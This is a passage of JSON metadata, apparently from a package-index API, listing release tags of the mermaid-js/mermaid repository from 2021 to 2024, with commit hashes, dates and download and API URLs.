@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_p